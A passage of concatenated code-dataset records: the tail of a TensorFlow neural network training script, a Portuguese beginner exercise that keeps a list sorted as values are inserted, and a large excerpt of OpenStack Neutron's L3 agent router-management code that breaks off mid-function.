math.sqrt(float(NUM_FEATURES))),\n name='weights')\n h_biases = tf.Variable(tf.zeros([num_neurons]), name='biases')\n\n h = tf.nn.relu(tf.matmul(x, h_weights) + h_biases)\n\n # Hidden 2\n h2_weights = tf.Variable(\n tf.random.truncated_normal([num_neurons, num_neurons], stddev=1.0 / math.sqrt(float(NUM_FEATURES))),\n name='weights')\n h2_biases = tf.Variable(tf.zeros([num_neurons]), name='biases')\n\n h2 = tf.nn.relu(tf.matmul(h, h2_weights) + h2_biases)\n\n # Output layer\n weights = tf.Variable(\n tf.random.truncated_normal([num_neurons, NUM_CLASSES], stddev=1.0 / math.sqrt(float(NUM_FEATURES))),\n name='weights')\n biases = tf.Variable(tf.zeros([NUM_CLASSES]), name='biases')\n logits = tf.matmul(h2, weights) + biases\n\n # Build the graph for the deep net\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=y_, logits=logits)\n L2_regularization = tf.nn.l2_loss(h_weights) + tf.nn.l2_loss(h2_weights) + tf.nn.l2_loss(weights)\n loss = tf.reduce_mean(cross_entropy + beta * L2_regularization)\n\n # Create the gradient descent optimizer with the given learning rate.\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n train_op = optimizer.minimize(loss)\n\n correct_prediction = tf.cast(tf.equal(tf.argmax(logits, 1), tf.argmax(y_, 1)), tf.float32)\n accuracy = tf.reduce_mean(correct_prediction)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n train_acc = []\n test_acc = []\n\n for i in range(epochs):\n np.random.shuffle(idx)\n 
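The starter code builds one-hot targets with fancy indexing (trainY[np.arange(N), labels - 1] = 1, since CTG classes are 1-based) and min-max scales each feature column. A tiny standalone check of both tricks:

import numpy as np

labels = np.array([1, 3, 2])
one_hot = np.zeros((labels.size, 3))
one_hot[np.arange(labels.size), labels - 1] = 1
# -> [[1,0,0], [0,0,1], [0,1,0]]

X = np.array([[0.0, 10.0], [5.0, 20.0], [10.0, 30.0]])
X_scaled = (X - X.min(axis=0)) / (X.max(axis=0) - X.min(axis=0))
# each column now spans [0, 1]
print(one_hot, X_scaled, sep='\n')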
trainX = trainX[idx]\n trainY = trainY[idx]\n\n for start, end in zip(range(0, n, batch_size), range(batch_size, n, batch_size)):\n train_op.run(feed_dict={x: trainX[start:end], y_: trainY[start:end]})\n\n train_acc.append(accuracy.eval(feed_dict={x: trainX, y_: trainY}))\n test_acc.append(accuracy.eval(feed_dict={x: testX, y_: testY}))\n\n if i % 100 == 0:\n print('iter %d: training accuracy %g' % (i, train_acc[i]))\n print('iter %d: test accuracy %g' % (i, test_acc[i]), '\\n')\n\n return train_acc, test_acc\n\ndef main():\n train = []\n test = []\n layer = [3, 4]\n\n for i in range(len(layer)):\n train_acc, test_acc = fnn(layer[i])\n\n train.append(train_acc)\n test.append(test_acc)\n\n # plot learning curves\n for j in range(2):\n plt.figure(1)\n plt.plot(range(epochs), train[j])\n plt.legend([\"[3, 8, 20, 1e-9]\", \"[4, 32, 10, 10, 1e-6]\"], loc='lower right')\n plt.xlabel(str(epochs) + ' iterations')\n plt.ylabel('Accuracy')\n plt.title('Train Accuracy')\n plt.savefig('./figures/PartA_Qn5b_Acc.png')\n\n plt.figure(2)\n plt.plot(range(epochs), test[j])\n plt.legend([\"[3, 8, 20, 1e-9]\", \"[4, 32, 10, 10, 1e-6]\"], loc='lower right')\n plt.xlabel(str(epochs) + ' iterations')\n plt.ylabel('Accuracy')\n plt.title('Test Accuracy')\n plt.savefig('./figures/PartA_Qn5b_Err.png')\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pngqj/CZ4042-Neural-Network-project","sub_path":"project 1/Part A/Qn5B.py","file_name":"Qn5B.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72972125993","text":"'''\nCrie um programa onde o usuário possa digitar cinco valores numéricos e cadastre-os em uma lista, \njá na posição correta de inserção (sem usar o sort()). 
\nNo final, mostre a lista ordenada na tela.\n'''\nfrom os import system\nsystem('clear')\n\nlista = []\nfor c in range(0, 5):\n numero = int(input('Registre um valor: '))\n\n if c == 0 or numero > lista[-1]:\n lista.append(numero)\n print('Adicionado ao final da lista')\n else:\n posicao = 0\n while posicao < len(lista):\n if numero <= lista[posicao]:\n lista.insert(posicao, numero)\n print(f'Adicionado na posição {posicao} da lista')\n break\n posicao += 1\n\nprint(f'Os valores registrados são: {lista}')\n","repo_name":"bernaRocha/guanabara_Python","sub_path":"exercicios71-90/ex_080-lista-ordenada.py","file_name":"ex_080-lista-ordenada.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8669826271","text":"import functools\n\nimport eventlet\nimport netaddr\nfrom neutron_lib.agent import constants as agent_consts\nfrom neutron_lib.agent import topics\nfrom neutron_lib.callbacks import events\nfrom neutron_lib.callbacks import registry\nfrom neutron_lib.callbacks import resources\nfrom neutron_lib import constants as lib_const\nfrom neutron_lib import context as n_context\nfrom neutron_lib.exceptions import l3 as l3_exc\nfrom neutron_lib import rpc as n_rpc\nfrom oslo_concurrency import lockutils\nfrom oslo_config import cfg\nfrom oslo_context import context as common_context\nfrom oslo_log import log as logging\nimport oslo_messaging\nfrom oslo_serialization import jsonutils\nfrom oslo_service import loopingcall\nfrom oslo_service import periodic_task\nfrom oslo_utils import excutils\nfrom oslo_utils import netutils\nfrom oslo_utils import timeutils\nfrom osprofiler import profiler\n\nfrom neutron.agent.common import resource_processing_queue as queue\nfrom neutron.agent.common import utils as common_utils\nfrom neutron.agent.l3 import dvr\nfrom neutron.agent.l3 import dvr_edge_ha_router\nfrom neutron.agent.l3 import dvr_edge_router as dvr_router\nfrom neutron.agent.l3 import dvr_local_router\nfrom neutron.agent.l3 import ha\nfrom neutron.agent.l3 import ha_router\nfrom neutron.agent.l3 import l3_agent_extension_api as l3_ext_api\nfrom neutron.agent.l3 import l3_agent_extensions_manager as l3_ext_manager\nfrom neutron.agent.l3 import legacy_router\nfrom neutron.agent.l3 import namespace_manager\nfrom neutron.agent.l3 import namespaces as l3_namespaces\nfrom neutron.agent.linux import external_process\nfrom neutron.agent.linux import pd\nfrom neutron.agent.metadata import driver as metadata_driver\nfrom neutron.agent import rpc as agent_rpc\nfrom neutron.common import utils\nfrom neutron import manager\n\nLOG = logging.getLogger(__name__)\n\n# Number of routers to fetch from server at a time on resync.\n# Needed to reduce load on server side and to speed up resync on agent side.\nSYNC_ROUTERS_MAX_CHUNK_SIZE = 256\nSYNC_ROUTERS_MIN_CHUNK_SIZE = 32\n\n# Priorities - lower value is higher priority\nPRIORITY_RELATED_ROUTER = 0\nPRIORITY_RPC = 1\nPRIORITY_SYNC_ROUTERS_TASK = 2\nPRIORITY_PD_UPDATE = 3\n\n# Actions\nDELETE_ROUTER = 1\nDELETE_RELATED_ROUTER = 2\nADD_UPDATE_ROUTER = 3\nADD_UPDATE_RELATED_ROUTER = 4\nPD_UPDATE = 5\nUPDATE_NETWORK = 6\n\nRELATED_ACTION_MAP = {DELETE_ROUTER: DELETE_RELATED_ROUTER,\n ADD_UPDATE_ROUTER: ADD_UPDATE_RELATED_ROUTER}\n\nROUTER_PROCESS_GREENLET_MAX = 32\nROUTER_PROCESS_GREENLET_MIN = 8\n\n\ndef log_verbose_exc(message, router_payload):\n LOG.exception(message)\n LOG.debug(\"Payload:\\n%s\",\n utils.DelayedStringRenderer(jsonutils.dumps,\n router_payload, 
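The exercise's manual scan-and-insert keeps the list sorted without sort(); the stdlib equivalent is bisect.insort, which binary-searches for the insertion point:

import bisect

lista = []
for numero in (5, 2, 9, 2, 7):
    bisect.insort(lista, numero)  # keeps 'lista' ordered as each value arrives
print(lista)  # [2, 2, 5, 7, 9]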
indent=5))\n\n\nclass L3PluginApi(object):\n \"\"\"Agent side of the l3 agent RPC API.\n\n API version history:\n 1.0 - Initial version.\n 1.1 - Floating IP operational status updates\n 1.2 - DVR support: new L3 plugin methods added.\n - get_ports_by_subnet\n - get_agent_gateway_port\n Needed by the agent when operating in DVR/DVR_SNAT mode\n 1.3 - Get the list of activated services\n 1.4 - Added L3 HA update_router_state. This method was reworked in\n to update_ha_routers_states\n 1.5 - Added update_ha_routers_states\n 1.6 - Added process_prefix_update\n 1.7 - DVR support: new L3 plugin methods added.\n - delete_agent_gateway_port\n 1.8 - Added address scope information\n 1.9 - Added get_router_ids\n 1.10 Added update_all_ha_network_port_statuses\n 1.11 Added get_host_ha_router_count\n 1.12 Added get_networks\n 1.13 Removed get_external_network_id\n \"\"\"\n\n def __init__(self, topic, host):\n self.host = host\n target = oslo_messaging.Target(topic=topic, version='1.0')\n self.client = n_rpc.get_client(target)\n\n @utils.timecost\n def get_routers(self, context, router_ids=None):\n \"\"\"Make a remote process call to retrieve the sync data for routers.\"\"\"\n cctxt = self.client.prepare()\n return cctxt.call(context, 'sync_routers', host=self.host,\n router_ids=router_ids)\n\n @utils.timecost\n def update_all_ha_network_port_statuses(self, context):\n \"\"\"Make a remote process call to update HA network port status.\"\"\"\n cctxt = self.client.prepare(version='1.10')\n return cctxt.call(context, 'update_all_ha_network_port_statuses',\n host=self.host)\n\n @utils.timecost\n def get_router_ids(self, context):\n \"\"\"Make a remote process call to retrieve scheduled routers ids.\"\"\"\n cctxt = self.client.prepare(version='1.9')\n return cctxt.call(context, 'get_router_ids', host=self.host)\n\n @utils.timecost\n def update_floatingip_statuses(self, context, router_id, fip_statuses):\n \"\"\"Call the plugin update floating IPs's operational status.\"\"\"\n cctxt = self.client.prepare(version='1.1')\n return cctxt.call(context, 'update_floatingip_statuses',\n router_id=router_id, fip_statuses=fip_statuses)\n\n @utils.timecost\n def get_ports_by_subnet(self, context, subnet_id):\n \"\"\"Retrieve ports by subnet id.\"\"\"\n cctxt = self.client.prepare(version='1.2')\n return cctxt.call(context, 'get_ports_by_subnet', host=self.host,\n subnet_id=subnet_id)\n\n @utils.timecost\n def get_agent_gateway_port(self, context, fip_net):\n \"\"\"Get or create an agent_gateway_port.\"\"\"\n cctxt = self.client.prepare(version='1.2')\n return cctxt.call(context, 'get_agent_gateway_port',\n network_id=fip_net, host=self.host)\n\n @utils.timecost\n def get_service_plugin_list(self, context):\n \"\"\"Make a call to get the list of activated services.\"\"\"\n cctxt = self.client.prepare(version='1.3')\n return cctxt.call(context, 'get_service_plugin_list')\n\n @utils.timecost\n def update_ha_routers_states(self, context, states):\n \"\"\"Update HA routers states.\"\"\"\n cctxt = self.client.prepare(version='1.5')\n return cctxt.cast(context, 'update_ha_routers_states',\n host=self.host, states=states)\n\n @utils.timecost\n def process_prefix_update(self, context, prefix_update):\n \"\"\"Process prefix update whenever prefixes get changed.\"\"\"\n cctxt = self.client.prepare(version='1.6')\n return cctxt.call(context, 'process_prefix_update',\n subnets=prefix_update)\n\n @utils.timecost\n def delete_agent_gateway_port(self, context, fip_net):\n \"\"\"Delete Floatingip_agent_gateway_port.\"\"\"\n cctxt = 
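Every method in L3PluginApi follows the same oslo.messaging shape: prepare() pins the minimum RPC version the server must speak, call() blocks for a reply, and cast() (see update_ha_routers_states) is fire-and-forget. A stripped-down sketch of the pattern with a hypothetical method name:

import oslo_messaging
from neutron_lib import rpc as n_rpc

class ExamplePluginApi(object):
    def __init__(self, topic, host):
        self.host = host
        target = oslo_messaging.Target(topic=topic, version='1.0')
        self.client = n_rpc.get_client(target)

    def get_example_data(self, context, some_id):
        # call() waits for the server's return value; cast() would not.
        cctxt = self.client.prepare(version='1.0')
        return cctxt.call(context, 'get_example_data',
                          host=self.host, some_id=some_id)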
self.client.prepare(version='1.7')\n return cctxt.call(context, 'delete_agent_gateway_port',\n host=self.host, network_id=fip_net)\n\n @utils.timecost\n def get_host_ha_router_count(self, context):\n \"\"\"Make a call to get the count of HA router.\"\"\"\n cctxt = self.client.prepare(version='1.11')\n return cctxt.call(context, 'get_host_ha_router_count', host=self.host)\n\n def get_networks(self, context, filters=None, fields=None):\n \"\"\"Get networks.\n\n :param context: Security context\n :param filters: The filters to apply.\n E.g {\"id\" : [\"\", ...]}\n :param fields: A list of fields to collect, e.g [\"id\", \"subnets\"].\n :return: A list of dicts where each dict represent a network object.\n \"\"\"\n\n cctxt = self.client.prepare(version='1.12')\n return cctxt.call(\n context, 'get_networks', filters=filters, fields=fields)\n\n\nclass RouterFactory(object):\n\n def __init__(self):\n self._routers = {}\n\n def register(self, features, router_cls):\n \"\"\"Register router class which implements BaseRouterInfo\n\n Features which is a list of strings converted to frozenset internally\n for key uniqueness.\n\n :param features: a list of strings of router's features\n :param router_cls: a router class which implements BaseRouterInfo\n \"\"\"\n self._routers[frozenset(features)] = router_cls\n\n def create(self, features, **kwargs):\n \"\"\"Create router instance with registered router class\n\n :param features: a list of strings of router's features\n :param kwargs: arguments for router class\n :returns: a router instance which implements BaseRouterInfo\n :raises: n_exc.RouterNotFoundInRouterFactory\n \"\"\"\n try:\n router = self._routers[frozenset(features)]\n return router(**kwargs)\n except KeyError:\n exc = l3_exc.RouterNotFoundInRouterFactory(\n router_id=kwargs['router_id'], features=features)\n LOG.exception(exc.msg)\n raise exc\n\n\n@profiler.trace_cls(\"l3-agent\")\nclass L3NATAgent(ha.AgentMixin,\n dvr.AgentMixin,\n manager.Manager):\n \"\"\"Manager for L3NatAgent\n\n API version history:\n 1.0 initial Version\n 1.1 changed the type of the routers parameter\n to the routers_updated method.\n It was previously a list of routers in dict format.\n It is now a list of router IDs only.\n Per rpc versioning rules, it is backwards compatible.\n 1.2 - DVR support: new L3 agent methods added.\n - add_arp_entry\n - del_arp_entry\n 1.3 - fipnamespace_delete_on_ext_net - to delete fipnamespace\n after the external network is removed\n Needed by the L3 service when dealing with DVR\n 1.4 - support network_update to get MTU updates\n \"\"\"\n target = oslo_messaging.Target(version='1.4')\n\n def __init__(self, host, conf=None):\n if conf:\n self.conf = conf\n else:\n self.conf = cfg.CONF\n self.check_config()\n self.router_info = {}\n self.router_factory = RouterFactory()\n self._register_router_cls(self.router_factory)\n\n self._check_config_params()\n\n self.process_monitor = external_process.ProcessMonitor(\n config=self.conf,\n resource_type='router')\n\n self._context = n_context.get_admin_context_without_session()\n self.plugin_rpc = L3PluginApi(topics.L3PLUGIN, host)\n\n self.driver = common_utils.load_interface_driver(\n self.conf,\n get_networks_callback=functools.partial(\n self.plugin_rpc.get_networks, self.context))\n\n self.fullsync = True\n self.sync_routers_chunk_size = SYNC_ROUTERS_MAX_CHUNK_SIZE\n self._exiting = False\n\n # Get the HA router count from Neutron Server\n # This is the first place where we contact neutron-server on startup\n # so retry in case its not 
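RouterFactory keys its registry on frozenset(features), so registration and lookup are order-insensitive: ['ha', 'distributed'] and ['distributed', 'ha'] resolve to the same class. The same trick in isolation:

class FeatureFactory(object):
    def __init__(self):
        self._classes = {}

    def register(self, features, cls):
        # frozenset is hashable and ignores ordering and duplicates.
        self._classes[frozenset(features)] = cls

    def create(self, features, **kwargs):
        return self._classes[frozenset(features)](**kwargs)

factory = FeatureFactory()
factory.register(['ha', 'distributed'], dict)
assert factory.create(['distributed', 'ha'], a=1) == {'a': 1}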
ready to respond.\n while True:\n try:\n self.ha_router_count = int(\n self.plugin_rpc.get_host_ha_router_count(self.context))\n except oslo_messaging.MessagingTimeout as e:\n LOG.warning('l3-agent cannot contact neutron server '\n 'to retrieve HA router count. '\n 'Check connectivity to neutron server. '\n 'Retrying... '\n 'Detailed message: %(msg)s.', {'msg': e})\n continue\n break\n LOG.info(\"Agent HA routers count %s\", self.ha_router_count)\n\n self.init_extension_manager(self.plugin_rpc)\n\n self.metadata_driver = None\n if self.conf.enable_metadata_proxy:\n self.metadata_driver = metadata_driver.MetadataDriver(self)\n\n self.namespaces_manager = namespace_manager.NamespaceManager(\n self.conf,\n self.driver,\n self.metadata_driver)\n\n # L3 agent router processing green pool\n self._pool_size = ROUTER_PROCESS_GREENLET_MIN\n self._pool = eventlet.GreenPool(size=self._pool_size)\n self._queue = queue.ResourceProcessingQueue()\n super(L3NATAgent, self).__init__(host=self.conf.host)\n\n self.target_ex_net_id = None\n self.use_ipv6 = netutils.is_ipv6_enabled()\n\n self.pd = pd.PrefixDelegation(self.context, self.process_monitor,\n self.driver,\n self.plugin_rpc.process_prefix_update,\n self.create_pd_router_update,\n self.conf)\n\n # Consume network updates to trigger router resync\n consumers = [[topics.NETWORK, topics.UPDATE]]\n agent_rpc.create_consumers([self], topics.AGENT, consumers)\n\n self._check_ha_router_process_status()\n\n def check_config(self):\n if self.conf.cleanup_on_shutdown:\n LOG.warning(\"cleanup_on_shutdown is set to True, so L3 agent will \"\n \"cleanup all its routers when exiting, \"\n \"data-plane will be affected.\")\n\n def _check_ha_router_process_status(self):\n \"\"\"Check HA router VRRP process status in network node.\n\n Check if the HA router HA routers VRRP (keepalived) process count\n and state change python monitor process count meet the expected\n quantity. If so, l3-agent will not call neutron to set all related\n HA port to down state, this can prevent some unexpected VRRP\n re-election. If not, a physical host may have down and just\n restarted, set HA network port status to DOWN.\n \"\"\"\n if (self.conf.agent_mode not in [lib_const.L3_AGENT_MODE_DVR_SNAT,\n lib_const.L3_AGENT_MODE_LEGACY]):\n return\n\n if self.ha_router_count <= 0:\n return\n\n # Only set HA ports down when host was rebooted so no net\n # namespaces were still created.\n if any(ns.startswith(l3_namespaces.NS_PREFIX) for ns in\n self.namespaces_manager.list_all()):\n LOG.debug(\"Network configuration already done. Skipping\"\n \" set HA port to DOWN state.\")\n return\n\n LOG.debug(\"Call neutron server to set HA port to DOWN state.\")\n try:\n # We set HA network port status to DOWN to let l2 agent\n # update it to ACTIVE after wiring. 
This allows us to spawn\n # keepalived only when l2 agent finished wiring the port.\n self.plugin_rpc.update_all_ha_network_port_statuses(\n self.context)\n except Exception:\n LOG.exception('update_all_ha_network_port_statuses failed')\n\n def _register_router_cls(self, factory):\n factory.register([], legacy_router.LegacyRouter)\n factory.register(['ha'], ha_router.HaRouter)\n\n if self.conf.agent_mode == lib_const.L3_AGENT_MODE_DVR_SNAT:\n factory.register(['distributed'],\n dvr_router.DvrEdgeRouter)\n factory.register(['ha', 'distributed'],\n dvr_edge_ha_router.DvrEdgeHaRouter)\n else:\n factory.register(['distributed'],\n dvr_local_router.DvrLocalRouter)\n factory.register(['ha', 'distributed'],\n dvr_local_router.DvrLocalRouter)\n\n def _check_config_params(self):\n \"\"\"Check items in configuration files.\n\n Check for required and invalid configuration items.\n The actual values are not verified for correctness.\n \"\"\"\n if not self.conf.interface_driver:\n msg = 'An interface driver must be specified'\n LOG.error(msg)\n raise SystemExit(1)\n\n if self.conf.ipv6_gateway:\n # ipv6_gateway configured. Check for valid v6 link-local address.\n try:\n msg = (\"%s used in config as ipv6_gateway is not a valid \"\n \"IPv6 link-local address.\")\n ip_addr = netaddr.IPAddress(self.conf.ipv6_gateway)\n if ip_addr.version != 6 or not ip_addr.is_link_local():\n LOG.error(msg, self.conf.ipv6_gateway)\n raise SystemExit(1)\n except netaddr.AddrFormatError:\n LOG.error(msg, self.conf.ipv6_gateway)\n raise SystemExit(1)\n\n def _create_router(self, router_id, router):\n kwargs = {\n 'agent': self,\n 'router_id': router_id,\n 'router': router,\n 'use_ipv6': self.use_ipv6,\n 'agent_conf': self.conf,\n 'interface_driver': self.driver,\n }\n\n features = []\n if router.get('distributed'):\n features.append('distributed')\n kwargs['host'] = self.host\n\n if router.get('ha'):\n features.append('ha')\n\n if router.get('distributed') and router.get('ha'):\n # Case 1: If the router contains information about the HA interface\n # and if the requesting agent is a DVR_SNAT agent then go ahead\n # and create a HA router.\n # Case 2: If the router does not contain information about the HA\n # interface this means that this DVR+HA router needs to host only\n # the edge side of it, typically because it's landing on a node\n # that needs to provision a router namespace because of a DVR\n # service port (e.g. DHCP). 
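_check_config_params accepts ipv6_gateway only if it parses, is version 6, and is link-local (fe80::/10), since it is used as a next-hop on the external interface. The predicate in isolation, using the same netaddr calls:

import netaddr

for candidate in ('fe80::1', '2001:db8::1', 'not-an-ip'):
    try:
        ip = netaddr.IPAddress(candidate)
        print(candidate, ip.version == 6 and ip.is_link_local())
    except netaddr.AddrFormatError:
        print(candidate, 'invalid address')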
So go ahead and create a regular DVR\n # edge router.\n if (not router.get(lib_const.HA_INTERFACE_KEY) or\n self.conf.agent_mode != lib_const.L3_AGENT_MODE_DVR_SNAT):\n features.remove('ha')\n\n return self.router_factory.create(features, **kwargs)\n\n @lockutils.synchronized('resize_greenpool')\n def _resize_process_pool(self):\n pool_size = max([ROUTER_PROCESS_GREENLET_MIN,\n min([ROUTER_PROCESS_GREENLET_MAX,\n len(self.router_info)])])\n if pool_size == self._pool_size:\n return\n LOG.info(\"Resizing router processing queue green pool size to: %d\",\n pool_size)\n self._pool.resize(pool_size)\n self._pool_size = pool_size\n\n def _router_added(self, router_id, router):\n ri = self._create_router(router_id, router)\n registry.publish(resources.ROUTER, events.BEFORE_CREATE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router_id,\n states=(ri,)))\n\n self.router_info[router_id] = ri\n\n # If initialize() fails, cleanup and retrigger complete sync\n try:\n ri.initialize(self.process_monitor)\n except Exception:\n with excutils.save_and_reraise_exception():\n LOG.exception('Error while initializing router %s',\n router_id)\n self._cleanup_failed_router(router_id, delete_router_info=True)\n\n self._resize_process_pool()\n\n def _cleanup_failed_router(self, router_id, delete_router_info):\n ri = self.router_info.pop(router_id)\n self.namespaces_manager.ensure_router_cleanup(router_id)\n try:\n if delete_router_info:\n ri.delete()\n except Exception:\n LOG.exception('Error while deleting router %s',\n router_id)\n\n def _safe_router_removed(self, router_id):\n \"\"\"Try to delete a router and return True if successful.\"\"\"\n # The l3_ext_manager API expects a router dict, look it up\n ri = self.router_info.get(router_id)\n\n try:\n if ri:\n self.l3_ext_manager.delete_router(self.context, ri.router)\n self._router_removed(ri, router_id)\n except Exception:\n LOG.exception('Error while deleting router %s', router_id)\n return False\n\n self._resize_process_pool()\n return True\n\n def _router_removed(self, ri, router_id):\n \"\"\"Delete the router and stop the auxiliary processes\n\n This stops the auxiliary processes (keepalived, keepvalived-state-\n change, radvd, etc) and deletes the router ports and the namespace.\n The \"router_info\" cache is updated too at the beginning of the process,\n to avoid any other concurrent process to handle the router being\n deleted. If an exception is raised, the \"router_info\" cache is\n restored.\n \"\"\"\n if ri is None:\n LOG.warning(\"Info for router %s was not found. 
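The `_resize_process_pool` helper above sizes the green pool to the current router count, clamped between fixed bounds. The clamp is the usual `max(MIN, min(MAX, n))` idiom; a sketch with assumed constants (the real values are module-level constants in agent.py):

```python
ROUTER_PROCESS_GREENLET_MIN = 8    # assumed values for illustration
ROUTER_PROCESS_GREENLET_MAX = 32

def target_pool_size(num_routers):
    # Grow with the router count, but stay inside [MIN, MAX].
    return max(ROUTER_PROCESS_GREENLET_MIN,
               min(ROUTER_PROCESS_GREENLET_MAX, num_routers))

assert target_pool_size(1) == 8     # never below the floor
assert target_pool_size(20) == 20   # tracks the router count in range
assert target_pool_size(500) == 32  # capped at the ceiling
```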
\"\n \"Performing router cleanup\", router_id)\n self.namespaces_manager.ensure_router_cleanup(router_id)\n return\n\n registry.publish(resources.ROUTER, events.BEFORE_DELETE, self,\n payload=events.DBEventPayload(\n self.context, states=(ri,),\n resource_id=router_id))\n\n del self.router_info[router_id]\n try:\n ri.delete()\n except Exception:\n with excutils.save_and_reraise_exception():\n self.router_info[router_id] = ri\n LOG.debug(\"Router info %s delete action done, \"\n \"and it was removed from cache.\", router_id)\n\n registry.publish(resources.ROUTER, events.AFTER_DELETE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router_id,\n states=(ri,)))\n\n def init_extension_manager(self, connection):\n l3_ext_manager.register_opts(self.conf)\n self.agent_api = l3_ext_api.L3AgentExtensionAPI(self.router_info,\n self.router_factory)\n self.l3_ext_manager = (\n l3_ext_manager.L3AgentExtensionsManager(self.conf))\n self.l3_ext_manager.initialize(\n connection, lib_const.L3_AGENT_MODE,\n self.agent_api)\n\n def router_deleted(self, context, router_id):\n \"\"\"Deal with router deletion RPC message.\"\"\"\n LOG.debug('Got router deleted notification for %s', router_id)\n update = queue.ResourceUpdate(router_id,\n PRIORITY_RPC,\n action=DELETE_ROUTER)\n self._queue.add(update)\n\n def routers_updated(self, context, routers):\n \"\"\"Deal with routers modification and creation RPC message.\"\"\"\n LOG.debug('Got routers updated notification :%s', routers)\n if routers:\n # This is needed for backward compatibility\n if isinstance(routers[0], dict):\n routers = [router['id'] for router in routers]\n for id in routers:\n update = queue.ResourceUpdate(\n id, PRIORITY_RPC, action=ADD_UPDATE_ROUTER)\n self._queue.add(update)\n\n def router_removed_from_agent(self, context, payload):\n LOG.debug('Got router removed from agent :%r', payload)\n router_id = payload['router_id']\n update = queue.ResourceUpdate(router_id,\n PRIORITY_RPC,\n action=DELETE_ROUTER)\n self._queue.add(update)\n\n def router_added_to_agent(self, context, payload):\n LOG.debug('Got router added to agent :%r', payload)\n self.routers_updated(context, payload)\n\n def network_update(self, context, **kwargs):\n network_id = kwargs['network']['id']\n LOG.debug(\"Got network %s update\", network_id)\n for ri in self.router_info.values():\n update = queue.ResourceUpdate(ri.router_id,\n PRIORITY_RPC,\n action=UPDATE_NETWORK,\n resource=network_id)\n self._queue.add(update)\n\n def _process_network_update(self, router_id, network_id):\n\n def _port_belongs(p):\n return p['network_id'] == network_id\n\n ri = self.router_info.get(router_id)\n if not ri:\n return\n LOG.debug(\"Checking if router %s is plugged to the network %s\",\n ri, network_id)\n ports = list(ri.internal_ports)\n if ri.ex_gw_port:\n ports.append(ri.ex_gw_port)\n if any(_port_belongs(p) for p in ports):\n update = queue.ResourceUpdate(\n ri.router_id, PRIORITY_SYNC_ROUTERS_TASK)\n self._resync_router(update)\n\n def _process_router_if_compatible(self, router):\n # Either ex_net_id or handle_internal_only_routers must be set\n ex_net_id = (router['external_gateway_info'] or {}).get('network_id')\n if not ex_net_id and not self.conf.handle_internal_only_routers:\n raise l3_exc.RouterNotCompatibleWithAgent(router_id=router['id'])\n\n if router['id'] not in self.router_info:\n LOG.debug(\"Router %s info not in cache, \"\n \"will do the router add action.\", router['id'])\n self._process_added_router(router)\n else:\n LOG.debug(\"Router %s info in 
cache, \"\n \"will do the router update action.\", router['id'])\n self._process_updated_router(router)\n\n def _process_added_router(self, router):\n self._router_added(router['id'], router)\n ri = self.router_info[router['id']]\n ri.router = router\n try:\n ri.process()\n except Exception:\n with excutils.save_and_reraise_exception():\n LOG.exception('Error while processing router %s',\n router['id'])\n # NOTE(slaweq): deleting of the router info in the\n # _cleanup_failed_router is avoided as in case of error,\n # processing of the router will be retried on next call and\n # that may lead to some race conditions e.g. with\n # configuration of the DVR router's FIP gateway\n self._cleanup_failed_router(router['id'],\n delete_router_info=False)\n\n registry.publish(resources.ROUTER, events.AFTER_CREATE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router['id'],\n states=(ri,)))\n\n self.l3_ext_manager.add_router(self.context, router)\n\n def _process_updated_router(self, router):\n ri = self.router_info[router['id']]\n\n router_ha = router.get('ha')\n router_distributed = router.get('distributed')\n if ((router_ha is not None and ri.router.get('ha') != router_ha) or\n (router_distributed is not None and\n ri.router.get('distributed') != router_distributed)):\n LOG.warning('Type of the router %(id)s changed. '\n 'Old type: ha=%(old_ha)s; distributed=%(old_dvr)s; '\n 'New type: ha=%(new_ha)s; distributed=%(new_dvr)s',\n {'id': router['id'],\n 'old_ha': ri.router.get('ha'),\n 'old_dvr': ri.router.get('distributed'),\n 'new_ha': router.get('ha'),\n 'new_dvr': router.get('distributed')})\n ri = self._create_router(router['id'], router)\n self.router_info[router['id']] = ri\n\n is_dvr_snat_agent = (self.conf.agent_mode ==\n lib_const.L3_AGENT_MODE_DVR_SNAT)\n is_dvr_only_agent = (self.conf.agent_mode in\n [lib_const.L3_AGENT_MODE_DVR,\n lib_const.L3_AGENT_MODE_DVR_NO_EXTERNAL])\n old_router_ha_interface = ri.router.get(lib_const.HA_INTERFACE_KEY)\n current_router_ha_interface = router.get(lib_const.HA_INTERFACE_KEY)\n ha_interface_change = ((old_router_ha_interface is None and\n current_router_ha_interface is not None) or\n (old_router_ha_interface is not None and\n current_router_ha_interface is None))\n is_dvr_ha_router = router.get('distributed') and router.get('ha')\n\n if is_dvr_snat_agent and is_dvr_ha_router and ha_interface_change:\n LOG.debug(\"Removing HA router %s, since it is not bound to \"\n \"the current agent, and recreating regular DVR router \"\n \"based on service port requirements.\",\n router['id'])\n if self._safe_router_removed(router['id']):\n self._process_added_router(router)\n else:\n is_ha_router = getattr(ri, 'ha_state', False)\n # For HA routers check that DB state matches actual state\n if router.get('ha') and not is_dvr_only_agent and is_ha_router:\n self.check_ha_state_for_router(\n router['id'], router.get(lib_const.HA_ROUTER_STATE_KEY))\n ri.router = router\n registry.publish(resources.ROUTER, events.BEFORE_UPDATE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router['id'],\n states=(ri,)))\n\n ri.process()\n registry.publish(resources.ROUTER, events.AFTER_UPDATE, self,\n payload=events.DBEventPayload(\n self.context,\n resource_id=router['id'],\n states=(None, ri)))\n self.l3_ext_manager.update_router(self.context, router)\n\n def _resync_router(self, router_update,\n priority=PRIORITY_SYNC_ROUTERS_TASK):\n # Don't keep trying to resync if it's failing\n if router_update.hit_retry_limit():\n LOG.warning(\"Hit 
